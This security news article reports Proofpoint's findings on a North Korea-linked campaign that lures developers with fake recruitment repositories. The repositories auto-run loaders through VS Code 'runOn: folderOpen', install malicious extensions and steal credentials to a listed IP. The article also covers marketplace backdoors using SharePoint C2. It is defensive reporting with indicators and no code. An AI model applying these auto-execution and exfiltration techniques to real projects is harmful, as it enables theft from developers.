"The infection chain begins with emails containing links to actor-controlled GitHub repositories hosting malicious scripts that result in the execution of cross-platform malware for macOS, Linux, and Windows, including an open-source Go framework named Overlord," Proofpoint researchers Saher Naumaan and Carlos Rubio said.
UNK_DeadDrop: a recruitment lure delivering code that runs itself
Proofpoint has named a recent campaign UNK_DeadDrop and linked its tradecraft to a persistent North Korea-aligned cluster known as Contagious Interview (aka Famous Chollima, HexagonalRodent, and Void Dokkaebi). Over a six-week period the actor sent more than 250 emails to nearly 100 organizations across finance, cryptocurrency, education, technology and other sectors. Over 75% of targets were in the United States; others were in the U.K., Australia, France, Brazil, Germany, India, Israel, Japan, and the Netherlands.
The emails impersonated developer recruitment or code-review workflows, directing recipients to clone GitHub repositories and open them in Visual Studio Code (VS Code) or Cursor. Proofpoint says the repositories contained scripts that download platform-specific loaders — a shell script for macOS and Linux, and a VBScript for Windows — which then install a malicious VS Code extension (VSIX) that masquerades as a Google service.
Abusing VS Code: runOn: folderOpen and persistent extension installs
A focal technique tying the activity to Pyongyang, according to Proofpoint, is abuse of VS Code project settings using "runOn: folderOpen." That configuration triggers code execution when an editor opens a folder, requiring no further user interaction. Proofpoint notes Contagious Interview actors have used this approach since December 2025.
On Linux and macOS the loader delivers a custom build of the open-source Overlord framework; it prompts victims with a fake security pop-up to capture system passwords and enables data-theft functions. On Windows the VBScript executes a CMD file that installs the malicious extension, which communicates with an external server and performs reconnaissance and credential theft. Proofpoint reported exfiltration to "23.137.105[.]75:5173" via HTTP POST. Unlike the Linux/macOS agents, Proofpoint said the Windows pipeline uploads ZIP files, cleans up, and terminates rather than maintaining a persistent connection.
Marketplace backdoors: Yeeth Security finds VS Code extensions with SharePoint C2
Separately, Yeeth Security identified three malicious VS Code extensions on the official marketplace — "ByteBinTools.jupyter-powerdev-2026.6.8.vsix," "ToolCraft.jupyter-powertools-3.21.0.vsix," and "OLDev.markdown-mode-devtools-2.1.0.vsix" — that pose as Jupyter productivity tools but implement a multi-stage backdoor.
Yeeth's analysis shows a JavaScript layer that uses Microsoft Graph API and SharePoint as a command-and-control channel, with a SharePoint site acting as a command queue, victim registry, and exfiltration store. The backdoor supports arbitrary file read/write, file uploads/downloads, and code execution through a Windows executable and a Python script for Linux and macOS. The C2 can run commands and issue "host_action" operations to enumerate and transfer files.
Context: a wide set of developer-facing campaigns and supply-chain intrusions
Proofpoint and other firms describe a broad ecosystem of developer-focused abuse that intersects with UNK_DeadDrop. OpenSourceMalware detailed a follow-up to the Axios supply-chain incident that used three malicious npm packages and backup infrastructure to deliver an information stealer. Researchers documented TaskJacker, which drops malicious VS Code task files that execute when a repository is opened, and Contagious Interview's use of Git hooks (".githooks/pre-commit") to fire code on clone.
Trend Micro and others report the group's use of compromised packages on Packagist, repository tampering to inject obfuscated JavaScript, and migration of tools like InvisibleFerret into Cython-compiled formats for evasion. Panther, OpenSourceMalware, and others have traced hundreds of malicious npm and GitHub packages and repositories delivering stealers, RATs, and loaders. Expel's Marcus Hutchins quantified the impact in early 2026: attackers exfiltrated 26,584 cryptocurrency wallets from 2,726 infected developers' systems and stole $12 million in cryptocurrency in the first three months of 2026.
What this means for developers, security teams, and policymakers
- Developers and open-source maintainers: treat cloned repositories and incoming project files as potential execution vectors. Proofpoint's warning about "runOn: folderOpen" and TaskJacker-style task files shows that simply opening a project in VS Code can trigger loaders and extensions.
- Security teams and enterprise defenders: monitor for unusual VSIX installs, HTTP POST traffic to the IP seen in the campaign ("23.137.105[.]75:5173"), and the presence of Overlord or other unexpected binaries. The differing persistence models between platforms — persistent Overlord on Linux/macOS versus ephemeral Windows uploads — should shape detection and forensics playbooks.
- Policymakers and regulators: the pattern of shifting delivery mechanisms and pre-staged backup infrastructure cited by OpenSourceMalware, plus Expel's comment that financial motivation is central for North Korea, underscores that financially driven campaigns can scale rapidly and cross supply chains and marketplaces.
These incidents illustrate a steady evolution: threat actors are weaponizing everyday developer workflows and tooling into invisible delivery channels. The campaigns combine repository lures, IDE auto-execution, malicious marketplace artifacts, and cloud-based C2 over Microsoft Graph and SharePoint — a stack that traffics in trust as much as code. The practical question left by the record is whether IDE vendors, code-hosting platforms, and marketplaces can harden default behaviors and vet extensions quickly enough to blunt this class of attacks.
https://thehackernews.com/2026/06/north-korean-hackers-are-turning.html
